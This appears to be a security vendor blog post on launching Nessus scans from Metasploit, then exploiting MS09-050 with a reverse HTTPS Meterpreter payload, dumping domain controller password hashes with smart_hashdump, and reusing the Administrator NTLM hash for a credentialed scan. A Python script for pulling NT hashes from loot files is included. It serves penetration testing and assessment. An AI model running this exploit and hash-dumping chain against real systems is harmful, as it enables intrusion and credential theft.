Using Nessus and Metasploit Together

Security Tools Working Together

This is the third in a series of posts that describe the use of Nessus on BackTrack 5. Previous posts covered how to activate Nessus on BackTrack 5 and how to integrate Nmap, Hydra, and Nikto with Nessus. In this post we will cover initiating Nessus scans from within Metasploit. Beginning with Nessus 4, Tenable introduced the Nessus API, which lets users programmatically interface with a Nessus server using XMLRPC. Zate Berg took the initiative to write modules in Metasploit that, among other things, can launch a Nessus scan and import the results into the Metasploit database. From there, we can find which hosts are vulnerable to exploitation, exploit them, harvest the password hashes, and then use those password hashes to initiate credentialed Nessus scans.

Configuring Nessus

The first step needed to use Nessus with Metasploit is to log into Nessus and create a user for Metasploit. In this example, I created a user called "msf" with a password of "metasploit".

While logged in as "msf", I created a policy called "Windows Server Scan". The policy has all plugins enabled and most of the defaults were left as-is since I wanted to initiate a network-based vulnerability scan.

Setting up the Metasploit Database

The first thing to do in Metasploit is configure the database. There are some steps that you need to take prior to doing this, and I found the following two articles to be helpful:

The built-in policies show up as negative numbers, and policies created by the user are numbered sequentially starting with 1. "Windows Server Scan" is the policy we created and will use for this example. With this policy we can initiate a new scan using the "nessus_scan_new" command:

In the results for this particular host, Nessus reported that it was missing the patch for Microsoft security bulletin MS09-050. To see if Metasploit contains an exploit for that vulnerability, run the command "search exploits 09-050":

Success! The commands shown above set the target to be attacked (RHOST) and the host to call back to once the target system has been exploited (LHOST). We've chosen a reverse-connecting HTTPS Meterpreter payload, which will connect back to our Metasploit instance on port 8443. The next task is to dump the password hashes from the remote host. I chose to use a new module called "smart_hashdump". I chose this module because the remote host is an Active Directory domain controller and has a few thousand user accounts. smart_hashdump allows us to dump the password hashes and save them to a file:

meterpreter > run post/smart_hashdump SESSION=1,GETSYSTEM=true
[*] Running module against WIN-8BPIQBRO0CX
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /root/.msf3/loot/20110601044405_default_192.168.1.180_windows.hashes_561621.txt
[+] This host is a Domain Controller!
[*] Dumping password hashes...

Take a look at the first line in the file "/root/.msf3/loot/20110601044405_default_192.168.1.180_windows.hashes_561621.txt" and you will see something like the following:

This is the local Administrator account's password entry. Copy the second field (highlighted in bold), which is the NTLM hash of the local Administrator's password. Next, configure a new Nessus policy, and use the NTLM hash as the "SMB password":

Make sure to set the "SMB password type" field to "NTLM Hash" and the "SMB account" field to "Administrator".
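The manual step above (open the loot file, pick out the Administrator NT hash, paste it into the "SMB password" field) can be done with a small script. The following is an added example, not code from the original post or from Metasploit; it assumes the loot file uses pwdump-style lines of the form user:rid:LM:NT:::, and the sample lines and hash values below are constructed.

```python
import re

# Constructed sample in the assumed pwdump/John "password file" layout
# (user:rid:LM:NT:::). The hash values are made up, except the two sentinels below.
SAMPLE_LOOT = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
"""

# Well-known sentinel values: LM hashing disabled, and the NT hash of an empty password.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_loot(text):
    """Return (user, rid, lm, nt) tuples, skipping blank or malformed lines."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        # Only accept rows whose hash columns are really 32 hex characters.
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
            continue
        entries.append((user, int(rid), lm, nt))
    return entries


def nt_hash_for(text, account="Administrator"):
    """NT hash to enter in the Nessus 'SMB password' field with type 'NTLM Hash'.

    Raises ValueError if the account is missing or its NT hash is the
    empty-password value, since a credentialed scan with it would not be meaningful.
    """
    for user, _rid, _lm, nt in parse_loot(text):
        if user.lower() == account.lower():
            if nt == NT_EMPTY:
                raise ValueError(f"{account} has an empty password hash")
            return nt
    raise ValueError(f"{account} not found in loot file")


def weak_accounts(text):
    """Accounts whose NT hash is the empty-password value (a finding in its own right)."""
    return [u for u, _r, _l, nt in parse_loot(text) if nt == NT_EMPTY]


if __name__ == "__main__":
    print("SMB password (NTLM Hash):", nt_hash_for(SAMPLE_LOOT))
    print("Empty-password accounts:", weak_accounts(SAMPLE_LOOT))
```

To use it on a real dump, read the loot file from the path Metasploit printed and pass its contents to nt_hash_for().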

For comparison, the number of vulnerabilities found by scanning the target with credentials and without are shown below:

With credentials:

Without credentials:

Conclusion

It’s very pleasing to see the Nessus API being leveraged to help users be more productive. The Nessus bridge for Metasploit is a great user community project that has allowed Nessus to integrate with other popular security tools. You could even automate the above process using a script that would launch Nessus, run a scan, and exploit the remotely exploitable vulnerabilities. However, we do see that a credentialed scan produces a much more comprehensive report of the vulnerabilities present on a system. It ultimately becomes a choice of what you are trying to accomplish during your security assessments and most people will approach the process in their own way.
